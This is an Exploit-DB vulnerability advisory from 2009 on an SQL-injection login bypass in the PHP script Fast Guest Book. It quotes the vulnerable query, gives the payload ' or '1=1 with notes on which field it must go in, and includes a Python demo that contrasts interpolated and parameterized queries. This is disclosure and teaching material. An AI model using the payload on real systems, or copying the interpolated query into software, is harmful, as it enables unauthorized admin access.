Vendor: Fast Guest Book
By: Moudi
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Fast Guest Book
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2009

Fast Guest Book (Auth Bypass) SQL Injection Vulnerability

Fast Guest Book does not escape user-supplied input before concatenating it into an SQL query, which lets an attacker bypass authentication and reach the admin panel. The login check in \admin\authorize.php builds its query directly from $_POST['uname'] and $_POST['pass'] (see the raw data below). Submitting ' or '1=1 as the password closes the string literal and appends an always-true OR clause, so the query returns a row without valid credentials. Because AND binds tighter than OR, the same payload in the username field alone produces userid='' or ('1=1' AND pass='...'), which still requires the correct password; it has to go in the password field, or in both fields.

Mitigation:

Use prepared statements with bound parameters for the login query instead of interpolating $_POST values into the SQL string; bound values are passed as data and cannot change the query structure. Escaping the values before interpolation is a weaker fallback, and input validation on its own (length or character-class checks) is not a reliable defence against injection. The vulnerable snippet also compares the submitted password directly against the stored value; storing and comparing a salted password hash is a separate fix.
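The following is an added example, not code from the advisory or from Fast Guest Book. It reproduces the advisory's query-building pattern in Python against an in-memory SQLite table, runs the quoted payload from each input field, and shows the parameterized form that defeats it. The `admin` table and its single row are constructed here for the demo; only the column names (`userid`, `pass`) come from the advisory's query. It goes slightly beyond the advisory text by showing that the payload succeeds from the password field (or both fields) but not from the username field alone.

```python
import sqlite3

# Payload quoted in the advisory.
PAYLOAD = "' or '1=1"


def make_db():
    """Constructed stand-in for the application's `admin` table.

    Column names come from the advisory's query; the row itself is made up.
    """
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (userid TEXT, pass TEXT)")
    con.execute("INSERT INTO admin VALUES ('admin', 'secret')")
    return con


def build_vulnerable_query(uname, pw):
    # Same string interpolation as the advisory's \admin\authorize.php snippet:
    # the raw POST values land inside the single-quoted SQL literals.
    return f"select * from admin where userid='{uname}' AND pass='{pw}'"


def vulnerable_login(con, uname, pw):
    """Mirrors the vulnerable check: any row returned counts as authenticated."""
    return con.execute(build_vulnerable_query(uname, pw)).fetchone() is not None


def safe_login(con, uname, pw):
    """Hardened form: bound parameters, so quotes in the input stay data."""
    row = con.execute(
        "select * from admin where userid=? AND pass=?", (uname, pw)
    ).fetchone()
    return row is not None


def demo():
    """Run the payload through both versions from each input field."""
    con = make_db()
    return {
        # Real credentials work in both versions.
        "legit": vulnerable_login(con, "admin", "secret"),
        "safe_legit": safe_login(con, "admin", "secret"),
        # username='' or '1=1' AND pass='wrong' -> false OR (true AND false)
        "payload_in_username": vulnerable_login(con, PAYLOAD, "wrong"),
        # userid='x' AND pass='' or '1=1' -> (false AND false) OR true
        "payload_in_password": vulnerable_login(con, "x", PAYLOAD),
        # Both fields: the trailing OR '1=1' still makes the WHERE true.
        "payload_in_both": vulnerable_login(con, PAYLOAD, PAYLOAD),
        # With bound parameters the payload is just a wrong password.
        "safe_payload_in_password": safe_login(con, "x", PAYLOAD),
        "safe_payload_in_both": safe_login(con, PAYLOAD, PAYLOAD),
    }


if __name__ == "__main__":
    print(build_vulnerable_query("x", PAYLOAD))
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

SQLite is used here only because it ships with Python; the operator precedence (AND before OR) and the string-to-number coercion that makes '1=1' truthy behave the same way in MySQL, which is what a 2009 PHP guestbook would have used, so the field placement result carries over.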

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================

==============================================================================
    Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
==============================================================================

	[»] Script:             [ Fast Guest Book ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://fastcreators.com/products/guestbook/download.php ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
	[»] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
	[»] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===	
	
	[»] ' or '1=1

===[ BUG ]===	

        [»] Bug In \admin\authorize.php

            $query = "select * from admin where userid='{$_POST['uname']}' AND
            pass='{$_POST['pass']}'";



Author: Moudi

###########################################################################

# milw0rm.com [2009-01-11]